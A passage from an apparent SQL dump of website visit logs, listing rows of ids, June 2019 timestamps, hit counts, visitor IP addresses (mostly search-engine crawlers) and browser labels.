efox'),(428599,1560696553,1,1,0,0,'37.9.113.103','other'),(428600,1560696737,5,5,0,0,'176.9.28.16','other'),(428601,1560697361,1,1,0,0,'66.249.66.134','chrome'),(428602,1560697495,1,1,0,0,'157.55.39.112','other'),(428603,1560697517,1,1,0,0,'66.249.66.136','chrome'),(428604,1560697577,2,2,0,0,'66.249.66.138','chrome'),(428605,1560698320,1,1,0,0,'66.249.66.66','chrome'),(428606,1560698642,1,1,0,0,'207.46.13.137','other'),(428607,1560699319,2,2,0,0,'66.249.66.66','chrome'),(428608,1560699888,3,3,0,0,'66.249.66.138','chrome'),(428609,1560699939,2,2,0,0,'66.249.66.134','chrome'),(428610,1560700046,1,1,0,0,'66.249.66.64','chrome'),(428611,1560700088,2,2,0,0,'95.163.255.97','other'),(428612,1560700179,1,1,0,0,'95.163.255.98','other'),(428613,1560700182,1,1,0,0,'95.163.255.96','other'),(428614,1560700383,1,1,0,0,'95.163.255.99','other'),(428615,1560700395,1,1,0,0,'95.163.255.95','other'),(428616,1560701380,4,4,0,0,'66.249.66.138','chrome'),(428617,1560701739,1,1,0,0,'66.249.66.134','chrome'),(428618,1560701889,1,1,0,0,'66.249.66.136','chrome'),(428619,1560702407,2,2,0,0,'8.29.198.27','other'),(428620,1560702953,2,2,0,0,'66.249.66.134','chrome'),(428621,1560703217,3,3,0,0,'66.249.66.138','chrome'),(428622,1560703646,2,2,0,0,'40.77.167.222','other'),(428623,1560703770,3,3,0,0,'66.249.66.136','chrome'),(428624,1560703903,2,2,0,0,'66.249.66.134','chrome'),(428625,1560704094,2,2,0,0,'66.249.66.68','chrome'),(428626,1560704146,1,1,0,0,'66.249.66.138','chrome'),(428627,1560704677,1,1,0,0,'40.77.167.177','other'),(428628,1560704885,1,1,0,0,'40.77.167.222','other'),(428629,1560705370,1,1,0,0,'95.163.255.96','other'),(428630,1560705375,1,1,0,0,'95.163.255.92','other'),(428631,1560705465,1,1,0,0,'95.163.255.95','other'),(428632,1560705989,2,2,0,0,'95.163.255.93','other'),(428633,1560706235,2,2,0,0,'66.249.66.138','chrome'),(428634,1560706429,1,1,0,0,'66.249.66.64','chrome'),(428635,1560706466,1,1,0,0,'66.249.66.134','chrome'),(428636,1560706607,1,1,0,0,'40.77.167.222','other'),(428637,1560707032,1,1,0,0,'207.46.13.5','other'),(428638,1560707300,1,1,0,0,'66.249.66.138','chrome'),(428639,1560707612,1,1,0,0,'66.249.66.134','chrome'),(428640,1560708178,1,1,0,0,'207.46.13.1','other'),(428641,1560708296,1,1,0,0,'66.249.66.136','chrome'),(428642,1560708498,1,1,0,0,'66.249.66.68','chrome'),(428643,1560708890,1,1,0,0,'37.9.113.20','other'),(428644,1560709130,2,2,0,0,'66.249.66.134','chrome'),(428645,1560709336,1,1,0,0,'178.154.171.17','other'),(428646,1560709963,2,2,0,0,'66.249.66.138','chrome'),(428647,1560709978,2,2,0,0,'66.249.66.136','chrome'),(428648,1560710089,1,1,0,0,'51.158.98.255','other'),(428649,1560710536,1,1,0,0,'207.46.13.5','other'),(428650,1560710704,1,1,0,0,'66.249.66.66','chrome'),(428651,1560710794,1,1,0,0,'66.249.66.134','chrome'),(428652,1560710796,1,1,0,0,'207.46.13.199','other'),(428653,1560710862,1,1,0,0,'95.163.255.97','other'),(428654,1560710936,1,1,0,0,'66.249.66.68','chrome'),(428655,1560710948,1,1,0,0,'66.249.66.138','chrome'),(428656,1560711002,1,1,0,0,'95.163.255.94','other'),(428657,1560711018,1,1,0,0,'95.163.255.95','other'),(428658,1560711021,1,1,0,0,'95.163.255.92','other'),(428659,1560711131,1,1,0,0,'95.163.255.98','other'),(428660,1560711215,2,2,0,0,'95.163.255.93','other'),(428661,1560711384,1,1,0,0,'66.249.66.136','chrome'),(428662,1560712028,2,2,0,0,'207.46.13.199','other'),(428663,1560712286,4,4,0,0,'207.46.13.47','other'),(428664,1560712401,2,2,0,0,'66.249.66.134','chrome'),(428665,1560712747,1,1,0,0,'207.46.13.39','other'),(428666,1560712770,1,1,0,0,'51.68.152.26','chrome'),(428667,1560712930,1,1,0,0,'207.46.13.199','other'),(428668,1560712933,3,3,0,0,'40.77.167.222','other'),(428669,1560713076,1,1,0,0,'66.249.66.138','chrome'),(428670,1560713268,1,1,0,0,'8.29.198.26','other'),(428671,1560713284,3,3,0,0,'66.249.66.136','chrome'),(428672,1560713375,1,1,0,0,'66.249.66.134','chrome'),(428673,1560713766,1,1,0,0,'8.29.198.25','other'),(428674,1560714009,1,1,0,0,'66.249.66.68','chrome'),(428675,1560714182,1,1,0,0,'5.45.207.19','other'),(428676,1560714387,1,1,0,0,'66.249.66.64','chrome'),(428677,1560714937,1,1,0,0,'207.46.13.199','other'),(428678,1560715238,1,1,0,0,'66.249.66.134','chrome'),(428679,1560715890,1,1,0,0,'66.249.66.68','chrome'),(428680,1560716357,1,1,0,0,'193.106.30.98','chrome'),(428681,1560716504,2,2,0,0,'95.163.255.97','other'),(428682,1560716633,1,1,0,0,'95.163.255.93','other'),(428683,1560716733,2,2,0,0,'95.163.255.98','other'),(428684,1560716890,1,1,0,0,'95.163.255.99','other'),(428685,1560717165,2,2,0,0,'66.249.66.138','chrome'),(428686,1560717239,5,5,0,0,'66.249.66.136','chrome'),(428687,1560717295,3,3,0,0,'66.249.66.134','chrome'),(428688,1560717501,2,2,0,0,'66.249.66.64','chrome'),(428689,1560717647,1,1,0,0,'207.46.13.199','other'),(428690,1560718588,1,1,0,0,'23.100.232.233','msie'),(428691,1560718693,1,1,0,0,'66.249.66.136','chrome'),(428692,1560718983,2,2,0,0,'66.249.66.68','chrome'),(428693,1560719019,1,1,0,0,'207.46.13.199','other'),(428694,1560719814,2,2,0,0,'66.249.66.138','chrome'),(428695,1560720119,1,1,0,0,'66.249.66.136','chrome'),(428696,1560720182,1,1,0,0,'66.249.66.134','chrome'),(428697,1560720297,1,1,0,0,'207.46.13.199','other'),(428698,1560720631,1,1,0,0,'207.46.13.47','other'),(428699,1560720771,1,1,0,0,'66.249.66.138','chrome'),(428700,1560721410,1,1,0,0,'5.45.207.19','other'),(428701,1560721433,1,1,0,0,'23.100.232.233','msie'),(428702,1560721714,2,2,0,0,'207.46.13.199','other'),(428703,1560722183,3,3,0,0,'95.163.255.93','other'),(428704,1560722259,1,1,0,0,'95.163.255.97','other'),(428705,1560722400,2,2,0,0,'95.163.255.94','other'),(428706,1560722414,1,1,0,0,'66.249.66.136','chrome'),(428707,1560722527,2,2,0,0,'157.55.39.181','other'),(428708,1560723342,1,1,0,0,'5.45.207.80','other'),(428709,1560724116,2,2,0,0,'8.29.198.27','other'),(428710,1560724390,1,1,0,0,'66.249.66.134','chrome'),(428711,1560725124,1,1,0,0,'207.46.13.47','other'),(428712,1560725499,1,1,0,0,'66.249.66.136','chrome'),(428713,1560725616,5,5,0,0,'95.216.2.253','other'),(428714,1560725754,1,1,0,0,'95.163.255.99','other'),(428715,1560725950,1,1,0,0,'66.249.66.68','chrome'),(428716,1560725985,1,1,0,0,'66.249.66.64','chrome'),(428717,1560726353,1,1,0,0,'207.46.13.47','other'),(428718,1560726404,1,1,0,0,'66.249.66.136','chrome'),(428719,1560726770,1,1,0,0,'66.249.66.134','chrome'),(428720,1560727550,1,1,0,0,'95.163.255.97','other'),(428721,1560727644,1,1,0,0,'95.163.255.99','other'),(428722,1560727690,1,1,0,0,'23.100.232.233','msie'),(428723,1560727711,1,1,0,0,'95.163.255.93','other'),(428724,1560727844,1,1,0,0,'178.154.244.49','other'),(428725,1560727873,1,1,0,0,'66.249.66.138','chrome'),(428726,1560727945,1,1,0,0,'66.249.66.66','chrome'),(428727,1560728093,1,1,0,0,'95.108.181.57','other'),(428728,1560728140,1,1,0,0,'95.163.255.98','other'),(428729,1560728381,2,2,0,0,'95.163.255.92','other'),(428730,1560728385,2,2,0,0,'95.163.255.95','other'),(428731,1560728516,1,1,0,0,'95.163.255.97','other'),(428732,1560729081,1,1,0,0,'66.249.66.66','chrome'),(428733,1560729087,1,1,0,0,'66.249.66.136','chrome'),(428734,1560729138,1,1,0,0,'66.249.66.68','chrome'),(428735,1560730333,1,1,0,0,'66.249.66.134','chrome'),(428736,1560730350,1,1,0,0,'40.77.167.149','other'),(428737,1560730638,3,3,0,0,'66.249.66.136','chrome'),(428738,1560731047,1,1,0,0,'46.166.190.140','other'),(428739,1560731078,1,1,0,0,'213.180.203.53','other'),(428740,1560731184,1,1,0,0,'66.249.66.138','chrome'),(428741,1560731280,1,1,0,0,'23.100.232.233','msie'),(428742,1560732590,1,1,0,0,'157.55.39.181','other'),(428743,1560732764,2,2,0,0,'66.249.66.136','chrome'),(428744,1560732806,1,1,0,0,'66.249.66.68','chrome'),(428745,1560733336,1,1,0,0,'46.166.190.143','other'),(428746,1560733377,1,1,0,0,'95.163.255.98','other'),(428747,1560733702,3,3,0,0,'95.163.255.96','other'),(428748,1560733854,1,1,0,0,'95.163.255.94','other'),(428749,1560734680,1,1,0,0,'157.55.39.223','other'),(428750,1560734969,2,2,0,0,'8.29.198.27','other'),(428751,1560734970,1,1,0,0,'207.46.13.41','other'),(428752,1560735186,1,1,0,0,'66.249.66.138','chrome'),(428753,1560736052,1,1,0,0,'157.55.39.181','other'),(428754,1560736296,1,1,0,0,'66.249.66.136','chrome'),(428755,1560737138,2,2,0,0,'40.77.167.149','other'),(428756,1560737951,1,1,0,0,'66.249.66.136','chrome'),(428757,1560737963,1,1,0,0,'66.249.66.64','chrome'),(428758,1560738039,2,2,0,0,'66.249.66.138','chrome'),(428759,1560738059,3,3,0,0,'66.249.66.134','chrome'),(428760,1560738220,1,1,0,0,'207.46.13.41','other'),(428761,1560739156,21,21,0,0,'207.180.246.175','other'),(428762,1560739215,1,1,0,0,'157.55.39.223','other'),(428763,1560739900,2,2,0,0,'95.163.255.93','other'),(428764,1560739996,3,3,0,0,'66.249.66.136','chrome'),(428765,1560740005,1,1,0,0,'95.163.255.99','other'),(428766,1560740009,1,1,0,0,'95.163.255.92','other'),(428767,1560741324,4,4,0,0,'66.249.66.138','chrome'),(428768,1560741592,1,1,0,0,'66.249.66.136','chrome'),(428769,1560742315,1,1,0,0,'207.46.13.220','other'),(428770,1560742877,2,2,0,0,'66.249.66.136','chrome'),(428771,1560742895,1,1,0,0,'66.249.66.134','chrome'),(428772,1560742977,2,2,0,0,'66.249.66.138','chrome'),(428773,1560743277,1,1,0,0,'193.106.30.98','chrome'),(428774,1560743627,1,1,0,0,'207.46.13.41','other'),(428775,1560744447,2,2,0,0,'66.249.66.138','chrome'),(428776,1560744887,1,1,0,0,'66.249.66.66','chrome'),(428777,1560744928,2,2,0,0,'95.163.255.98','other'),(428778,1560745142,1,1,0,0,'95.163.255.97','other'),(428779,1560745396,1,1,0,0,'157.55.39.235','other'),(428780,1560745541,1,1,0,0,'95.163.255.92','other'),(428781,1560745779,1,1,0,0,'66.249.66.138','chrome'),(428782,1560745816,1,1,0,0,'8.29.198.27','other'),(428783,1560745897,1,1,0,0,'40.77.167.70','other'),(428784,1560746282,1,1,0,0,'8.29.198.25','other'),(428785,1560746293,2,2,0,0,'207.46.13.41','other'),(428786,1560746515,1,1,0,0,'66.249.66.136','chrome'),(428787,1560746602,1,1,0,0,'66.249.66.134','chrome'),(428788,1560746885,2,2,0,0,'207.46.13.156','other'),(428789,1560747453,1,1,0,0,'157.55.39.235','other'),(428790,1560747789,2,2,0,0,'66.249.66.138','chrome'),(428791,1560748316,1,1,0,0,'180.76.15.162','other'),(428792,1560748409,7,7,0,0,'207.46.13.41','other'),(428793,1560748415,2,2,0,0,'207.46.13.156','other'),(428794,1560748422,1,1,0,0,'157.55.39.235','other'),(428795,1560748524,1,1,0,0,'31.184.238.108','chrome'),(428796,1560748617,2,2,0,0,'66.249.66.134','chrome'),(428797,1560748685,1,1,0,0,'66.249.66.136','chrome'),(428798,1560748732,1,1,0,0,'91.196.178.79','chrome'),(428799,1560749347,2,2,0,0,'66.249.66.138','chrome'),(428800,1560749498,1,1,0,0,'109.70.100.22','other'),(428801,1560749902,1,1,0,0,'66.249.66.134','chrome'),(428802,1560749919,1,1,0,0,'157.55.39.235','other'),(428803,1560750037,1,1,0,0,'207.46.13.41','other'),(428804,1560750281,1,1,0,0,'66.249.66.64','chrome'),(428805,1560750381,1,1,0,0,'66.249.66.138','chrome'),(428806,1560750406,1,1,0,0,'40.77.167.70','other'),(428807,1560750659,3,3,0,0,'95.163.255.97','other'),(428808,1560751050,1,1,0,0,'95.163.255.93','other'),(428809,1560751581,1,1,0,0,'95.163.255.95','other'),(428810,1560751793,1,1,0,0,'66.249.66.138','chrome'),(428811,1560751812,1,1,0,0,'66.249.66.66','chrome'),(428812,1560751911,2,2,0,0,'66.249.66.136','chrome'),(428813,1560752028,2,2,0,0,'162.210.196.98','other'),(428814,1560752708,1,1,0,0,'91.196.178.41','chrome'),(428815,1560753189,2,2,0,0,'3.88.21.168','other'),(428816,1560753192,1,1,0,0,'52.23.240.44','other'),(428817,1560753193,2,2,0,0,'52.23.240.44','other'),(428818,1560753195,1,1,0,0,'18.215.250.1','other'),(428820,1560753196,1,1,0,0,'18.212.205.248','other'),(428821,1560753590,1,1,0,0,'66.249.66.134','chrome'),(428822,1560753593,1,1,0,0,'207.46.13.156','other'),(428823,1560754643,1,1,0,0,'66.249.66.68','chrome'),(428824,1560755316,1,1,0,0,'66.249.66.134','chrome'),(428825,1560755413,1,1,0,0,'91.196.178.52','chrome'),(428826,1560755588,1,1,0,0,'66.249.66.136','chrome'),(428827,1560756085,1,1,0,0,'207.46.13.156','other'),(428828,1560756270,2,2,0,0,'66.249.66.134','chrome'),(428829,1560756624,1,1,0,0,'95.163.255.92','other'),(428830,1560756691,1,1,0,0,'8.29.198.27','other'),(428831,1560756754,1,1,0,0,'66.249.66.66','chrome'),(428832,1560756768,1,1,0,0,'95.163.255.93','other'),(428833,1560756810,1,1,0,0,'95.163.255.95','other'),(428834,1560756837,1,1,0,0,'95.163.255.99','other'),(428835,1560757136,1,1,0,0,'8.29.198.25','other'),(428836,1560757304,1,1,0,0,'157.55.39.235','other'),(428837,1560757546,1,1,0,0,'66.249.66.64','chrome'),(428838,1560757676,1,1,0,0,'195.211.146.241','chrome'),(428839,1560757812,1,1,0,0,'66.249.66.134','chrome'),(428840,1560758712,1,1,0,0,'66.249.66.68','chrome'),(428841,1560759600,1,1,0,0,'66.249.66.64','chrome'),(428842,1560759975,1,1,0,0,'66.249.66.66','chrome'),(428843,1560761156,1,1,0,0,'66.249.66.134','chrome'),(428844,1560761482,1,1,0,0,'95.108.213.4','other'),(428845,1560761605,1,1,0,0,'95.163.255.98','other'),(428846,1560761640,1,1,0,0,'95.163.255.95','other'),(428847,1560761773,1,1,0,0,'207.46.13.153','other'),(428848,1560761842,1,1,0,0,'66.249.66.138','chrome'),(428849,1560762019,1,1,0,0,'95.163.255.99','other'),(428850,1560762159,1,1,0,0,'66.249.66.66','chrome'),(428851,1560762217,1,1,0,0,'95.163.255.92','other'),(428852,1560762219,1,1,0,0,'95.163.255.94','other'),(428853,1560762294,1,1,0,0,'95.163.255.97','other'),(428854,1560763327,1,1,0,0,'69.30.205.218','other'),(428855,1560763514,1,1,0,0,'207.46.13.153','other'),(428856,1560764539,3,3,0,0,'66.249.66.138','chrome'),(428857,1560764835,1,1,0,0,'157.55.39.235','other'),(428858,1560765098,1,1,0,0,'95.163.255.95','other'),(428859,1560765141,1,1,0,0,'40.77.167.196','other'),(428860,1560766121,1,1,0,0,'66.249.66.138','chrome'),(428861,1560766151,1,1,0,0,'141.8.142.103','other'),(428862,1560766441,1,1,0,0,'66.249.66.64','chrome'),(428863,1560766461,1,1,0,0,'66.249.66.136','chrome'),(428864,1560766528,1,1,0,0,'66.249.66.134','chrome'),(428865,1560766548,1,1,0,0,'66.249.66.66','chrome'),(428866,1560766881,1,1,0,0,'109.74.154.72','chrome'),(428867,1560767544,1,1,0,0,'95.163.255.92','other'),(428868,1560767562,1,1,0,0,'95.163.255.96','other'),(428869,1560767564,1,1,0,0,'8.29.198.25','other'),(428870,1560767722,2,2,0,0,'95.163.255.97','other'),(428871,1560767760,1,1,0,0,'95.163.255.98','other'),(428872,1560767986,1,1,0,0,'8.29.198.27','other'),(428873,1560768007,1,1,0,0,'95.163.255.94','other'),(428874,1560768046,1,1,0,0,'66.249.66.66','chrome'),(428875,1560768216,2,2,0,0,'66.249.66.138','chrome'),(428876,1560768391,1,1,0,0,'40.77.167.105','other'),(428877,1560768936,1,1,0,0,'207.46.13.197','other'),(428878,1560769367,1,1,0,0,'180.76.15.140','other'),(428879,1560769459,1,1,0,0,'66.249.83.202','chrome'),(428880,1560769469,1,1,0,0,'66.249.83.198','chrome'),(428881,1560769898,1,1,0,0,'66.249.66.136','chrome'),(428882,1560770773,1,1,0,0,'176.9.9.94','other'),(428883,1560771048,1,1,0,0,'40.77.167.105','other'),(428884,1560771365,1,1,0,0,'40.77.167.68','other'),(428885,1560772480,2,2,0,0,'66.249.66.68','chrome'),(428886,1560772723,1,1,0,0,'141.8.142.103','other'),(428887,1560772778,2,2,0,0,'207.46.13.198','other'),(428888,1560772893,1,1,0,0,'81.162.231.42','firefox'),(428889,1560773380,1,1,0,0,'95.163.255.96','other'),(428890,1560773541,1,1,0,0,'95.163.255.99','other'),(428891,1560773628,1,1,0,0,'95.163.255.94','other'),(428892,1560774516,1,1,0,0,'66.249.66.134','chrome'),(428893,1560774821,1,1,0,0,'66.249.66.136','chrome'),(428894,1560774894,1,1,0,0,'66.249.66.68','chrome'),(428895,1560775305,1,1,0,0,'40.77.167.129','other'),(428896,1560775681,2,2,0,0,'66.249.66.138','chrome'),(428897,1560776324,1,1,0,0,'178.154.244.11','other'),(428898,1560776473,3,3,0,0,'66.249.66.136','chrome'),(428899,1560776540,2,2,0,0,'207.46.13.198','other'),(428900,1560776909,1,1,0,0,'66.249.66.66','chrome'),(428901,1560777535,1,1,0,0,'46.166.137.207','other'),(428902,1560777668,2,2,0,0,'66.249.66.68','chrome'),(428903,1560778163,1,1,0,0,'66.249.66.136','chrome'),(428904,1560778461,2,2,0,0,'8.29.198.25','other'),(428905,1560778605,1,1,0,0,'95.163.255.92','other'),(428906,1560778608,1,1,0,0,'95.163.255.93','other'),(428907,1560778886,7,7,0,0,'66.249.66.134','chrome'),(428908,1560779063,1,1,0,0,'66.249.66.138','chrome'),(428909,1560779249,2,2,0,0,'66.249.66.136','chrome'),(428910,1560779666,1,1,0,0,'95.163.255.92','other'),(428911,1560779668,1,1,0,0,'95.163.255.99','other'),(428912,1560779689,1,1,0,0,'95.163.255.97','other'),(428913,1560779745,1,1,0,0,'66.249.66.64','chrome'),(428914,1560779856,1,1,0,0,'40.77.167.129','other'),(428915,1560780325,1,1,0,0,'66.249.66.136','chrome'),(428916,1560780679,1,1,0,0,'66.249.66.138','chrome'),(428917,1560780871,1,1,0,0,'66.249.66.134','chrome'),(428918,1560781944,3,3,0,0,'66.249.66.138','chrome'),(428919,1560782621,1,1,0,0,'66.249.66.66','chrome'),(428920,1560783190,1,1,0,0,'207.46.13.62','other'),(428921,1560783293,1,1,0,0,'40.77.167.129','other'),(428922,1560784227,1,1,0,0,'40.77.167.94','other'),(428923,1560784236,2,2,0,0,'95.163.255.93','other'),(428924,1560784548,3,3,0,0,'66.249.66.136','chrome'),(428925,1560784717,1,1,0,0,'66.249.66.134','chrome'),(428926,1560784746,1,1,0,0,'66.249.66.138','chrome'),(428927,1560784956,2,2,0,0,'95.163.255.99','other'),(428928,1560785370,1,1,0,0,'95.163.255.98','other'),(428929,1560785449,1,1,0,0,'95.163.255.94','other'),(428930,1560785566,1,1,0,0,'66.249.66.136','chrome'),(428931,1560785948,1,1,0,0,'40.77.167.129','other'),(428932,1560786034,1,1,0,0,'66.249.66.64','chrome'),(428933,1560786073,2,2,0,0,'66.249.66.134','chrome'),(428934,1560786301,2,2,0,0,'178.154.244.11','other'),(428935,1560786349,1,1,0,0,'40.77.167.94','other'),(428936,1560787049,1,1,0,0,'207.46.13.62','other'),(428937,1560787121,1,1,0,0,'40.77.167.129','other'),(428938,1560787233,3,3,0,0,'66.249.66.138','chrome'),(428939,1560787850,1,1,0,0,'66.249.66.66','chrome'),(428940,1560787975,3,3,0,0,'66.249.66.136','chrome'),(428941,1560789322,2,2,0,0,'8.29.198.25','other'),(428942,1560789527,1,1,0,0,'207.46.13.62','other'),(428943,1560789560,1,1,0,0,'66.249.66.64','chrome'),(428944,1560789630,3,3,0,0,'66.249.66.134','chrome'),(428945,1560789633,1,1,0,0,'66.249.66.66','chrome'),(428946,1560789676,3,3,0,0,'66.249.66.138','chrome'),(428947,1560790032,1,1,0,0,'95.163.255.95','other'),(428948,1560790551,1,1,0,0,'95.163.255.94','other'),(428949,1560790554,2,2,0,0,'95.163.255.97','other'),(428950,1560790556,1,1,0,0,'95.163.255.96','other'),(428951,1560790862,1,1,0,0,'66.249.66.138','chrome'),(428952,1560791128,1,1,0,0,'157.55.39.216','other'),(428953,1560791279,1,1,0,0,'178.154.244.11','other'),(428954,1560791337,1,1,0,0,'66.249.66.68','chrome'),(428955,1560791442,2,2,0,0,'66.249.66.134','chrome'),(428956,1560791481,3,3,0,0,'66.249.66.136','chrome'),(428957,1560792828,1,1,0,0,'207.46.13.62','other'),(428958,1560792855,1,0,1,0,'66.249.66.138',''),(428959,1560792871,1,0,1,0,'66.249.66.64',''),(428960,1560792998,1,1,0,0,'66.249.66.68','chrome'),(428961,1560793024,1,1,0,0,'66.249.66.64','chrome'),(428962,1560793076,2,2,0,0,'66.249.66.136','chrome'),(428963,1560793192,1,1,0,0,'95.28.88.130','msie'),(428964,1560793729,1,1,0,0,'178.154.244.11','other'),(428965,1560793924,2,2,0,0,'66.249.66.138','chrome'),(428966,1560793948,1,1,0,0,'87.250.224.47','other'),(428967,1560794532,1,1,0,0,'157.55.39.216','other'),(428968,1560794572,1,1,0,0,'66.249.66.66','chrome'),(428969,1560794654,2,2,0,0,'66.249.66.136','chrome'),(428970,1560794694,1,1,0,0,'66.249.66.68','chrome'),(428971,1560794994,2,2,0,0,'40.77.167.157','other'),(428972,1560795003,1,1,0,0,'40.77.167.168','other'),(428973,1560795195,1,1,0,0,'209.17.97.122','other'),(428974,1560795225,1,1,0,0,'66.249.66.64','chrome'),(428975,1560795489,1,1,0,0,'109.173.85.172','chrome'),(428976,1560795533,1,1,0,0,'66.249.66.138','chrome'),(428977,1560795758,1,1,0,0,'95.163.255.94','other'),(428978,1560795760,2,2,0,0,'95.163.255.95','other'),(428979,1560795778,1,1,0,0,'40.77.167.98','other'),(428980,1560795960,1,1,0,0,'95.163.255.98','other'),(428981,1560796618,1,1,0,0,'95.163.255.99','other'),(428982,1560796698,2,2,0,0,'40.77.167.98','other'),(428983,1560796702,3,3,0,0,'40.77.167.23','other'),(428984,1560796707,5,5,0,0,'207.46.13.192','other'),(428985,1560796714,1,1,0,0,'40.77.167.157','other'),(428986,1560796970,2,2,0,0,'66.249.66.136','chrome'),(428987,1560797151,2,2,0,0,'66.249.66.64','chrome'),(428988,1560797168,1,1,0,0,'66.249.66.138','chrome'),(428989,1560797627,1,1,0,0,'40.77.167.98','other'),(428990,1560797633,1,1,0,0,'40.77.167.23','other'),(428991,1560797870,2,2,0,0,'5.45.207.19','other'),(428992,1560797909,1,1,0,0,'178.154.244.11','other'),(428993,1560798142,1,1,0,0,'66.249.66.136','chrome'),(428994,1560798181,1,1,0,0,'40.77.167.157','other'),(428995,1560798277,2,2,0,0,'66.249.66.134','chrome'),(428996,1560798720,1,1,0,0,'40.77.167.98','other'),(428997,1560799148,1,1,0,0,'40.77.167.23','other'),(428998,1560799169,1,1,0,0,'87.250.224.81','other'),(428999,1560800202,2,2,0,0,'8.29.198.27','other'),(429000,1560800377,2,2,0,0,'66.249.66.64','chrome'),(429001,1560800510,2,2,0,0,'95.213.141.126','opera'),(429002,1560800738,2,2,0,0,'66.249.66.138','chrome'),(429003,1560801132,1,1,0,0,'95.163.255.93','other'),(429004,1560801213,1,1,0,0,'95.163.255.98','other'),(429005,1560801307,2,2,0,0,'66.249.66.134','chrome'),(429006,1560801426,1,1,0,0,'95.163.255.96','other'),(429007,1560801982,1,1,0,0,'66.249.66.64','chrome'),(429008,1560802081,1,1,0,0,'185.191.178.83','chrome'),(429009,1560802232,1,1,0,0,'91.209.11.236','other'),(429010,1560802330,1,1,0,0,'66.249.66.138','chrome'),(429011,1560803225,1,1,0,0,'95.216.16.51','other'),(429012,1560803471,1,1,0,0,'66.249.66.68','chrome'),(429013,1560804006,2,2,0,0,'66.249.66.138','chrome'),(429014,1560804244,1,1,0,0,'66.249.66.136','chrome'),(429015,1560804249,2,2,0,0,'40.77.167.157','other'),(429016,1560805148,1,1,0,0,'66.249.66.138','chrome'),(429017,1560806521,2,2,0,0,'95.163.255.97','other'),(429018,1560806585,1,1,0,0,'40.77.167.157','other'),(429019,1560806636,4,4,0,0,'95.163.255.96','other'),(429020,1560806721,1,1,0,0,'207.46.13.58','other'),(429021,1560806773,1,1,0,0,'66.249.66.138','chrome'),(429022,1560806813,1,1,0,0,'91.196.178.33','chrome'),(429023,1560806877,2,2,0,0,'95.163.255.98','other'),(429024,1560806961,3,3,0,0,'66.249.66.134','chrome'),(429025,1560807093,1,1,0,0,'95.163.255.93','other'),(429026,1560807906,1,1,0,0,'66.249.66.138','chrome'),(429027,1560809578,1,1,0,0,'66.249.66.136','chrome'),(429028,1560811059,1,1,0,0,'8.29.198.25','other'),(429029,1560811437,1,1,0,0,'8.29.198.26','other'),(429030,1560811565,1,1,0,0,'66.249.66.68','chrome'),(429031,1560812544,1,1,0,0,'66.249.66.66','chrome'),(429032,1560812788,2,2,0,0,'66.249.66.138','chrome'),(429033,1560812845,2,2,0,0,'66.249.66.136','chrome'),(429034,1560813371,1,1,0,0,'66.249.66.134','chrome'),(429035,1560813671,1,1,0,0,'95.163.255.98','other'),(429036,1560813688,1,1,0,0,'95.163.255.99','other'),(429037,1560813692,1,1,0,0,'95.163.255.94','other'),(429038,1560813695,1,1,0,0,'95.163.255.96','other'),(429039,1560814617,3,3,0,0,'66.249.66.136','chrome'),(429040,1560814964,1,1,0,0,'66.249.66.66','chrome'),(429041,1560815648,1,1,0,0,'66.249.66.134','chrome'),(429042,1560817976,1,1,0,0,'66.249.66.138','chrome'),(429043,1560819043,1,1,0,0,'66.249.66.136','chrome'),(429044,1560819745,2,2,0,0,'40.77.167.124','other'),(429045,1560819825,1,1,0,0,'5.45.207.79','other'),(429046,1560819870,1,1,0,0,'66.249.66.64','chrome'),(429047,1560820088,2,2,0,0,'40.77.167.20','other'),(429048,1560820298,1,1,0,0,'66.249.66.68','chrome'),(429049,1560820517,3,3,0,0,'40.77.167.212','other'),(429050,1560821499,1,1,0,0,'40.77.167.20','other'),(429051,1560821896,1,1,0,0,'66.249.66.138','chrome'),(429052,1560821920,1,1,0,0,'8.29.198.26','other'),(429053,1560821971,1,1,0,0,'40.77.167.24','other'),(429054,1560822285,1,1,0,0,'8.29.198.25','other'),(429055,1560822438,1,1,0,0,'207.46.13.176','other'),(429056,1560822687,2,2,0,0,'40.77.167.20','other'),(429057,1560823327,1,1,0,0,'193.106.30.98','chrome'),(429058,1560824247,2,2,0,0,'66.249.66.136','chrome'),(429059,1560824324,3,3,0,0,'66.249.66.134','chrome'),(429060,1560824359,1,1,0,0,'40.77.167.24','other'),(429061,1560824361,2,2,0,0,'207.46.13.31','other'),(429062,1560824365,1,1,0,0,'207.46.13.176','other'),(429063,1560824582,3,3,0,0,'66.249.66.138','chrome'),(429064,1560824794,1,1,0,0,'66.249.66.68','chrome'),(429065,1560825302,1,1,0,0,'40.77.167.24','other'),(429066,1560826656,1,1,0,0,'66.249.66.136','chrome'),(429067,1560827007,2,2,0,0,'66.249.66.64','chrome'),(429068,1560827187,1,1,0,0,'178.154.200.48','other'),(429069,1560827289,1,1,0,0,'40.77.167.24','other'),(429070,1560827290,1,1,0,0,'95.108.181.57','other'),(429071,1560827774,1,1,0,0,'40.77.167.20','other'),(429072,1560827981,2,2,0,0,'66.249.66.138','chrome'),(429073,1560828119,6,6,0,0,'66.249.66.134','chrome'),(429074,1560828171,1,1,0,0,'66.249.66.68','chrome'),(429075,1560828987,1,1,0,0,'141.8.142.103','other'),(429076,1560829192,2,2,0,0,'66.249.66.136','chrome'),(429077,1560829528,2,2,0,0,'66.249.66.134','chrome'),(429078,1560829624,1,1,0,0,'207.46.13.24','other'),(429079,1560830001,1,1,0,0,'188.231.244.83','chrome'),(429080,1560830103,3,3,0,0,'66.249.66.64','chrome'),(429081,1560830334,3,3,0,0,'66.249.66.136','chrome'),(429082,1560830445,2,2,0,0,'66.249.66.68','chrome'),(429083,1560830550,2,2,0,0,'66.249.66.138','chrome'),(429084,1560830765,1,1,0,0,'66.249.66.134','chrome'),(429085,1560831328,1,1,0,0,'178.154.244.11','other'),(429086,1560832287,4,4,0,0,'66.249.66.134','chrome'),(429087,1560832318,1,1,0,0,'66.249.66.64','chrome'),(429088,1560832325,1,1,0,0,'95.133.151.60','firefox'),(429089,1560832349,1,1,0,0,'207.46.13.24','other'),(429090,1560832369,1,1,0,0,'66.249.66.68','chrome'),(429091,1560832598,1,1,0,0,'66.249.66.136','chrome'),(429092,1560832777,2,2,0,0,'8.29.198.27','other'),(429093,1560832944,1,1,0,0,'207.46.13.88','other'),(429094,1560833253,1,1,0,0,'207.46.13.24','other'),(429095,1560833433,2,2,0,0,'66.249.66.134','chrome'),(429096,1560833563,2,2,0,0,'66.249.66.136','chrome'),(429097,1560834191,1,1,0,0,'66.249.66.138','chrome'),(429098,1560834200,1,1,0,0,'87.250.224.65','other'),(429099,1560834401,1,1,0,0,'180.76.15.152','other'),(429100,1560835508,1,1,0,0,'87.250.224.64',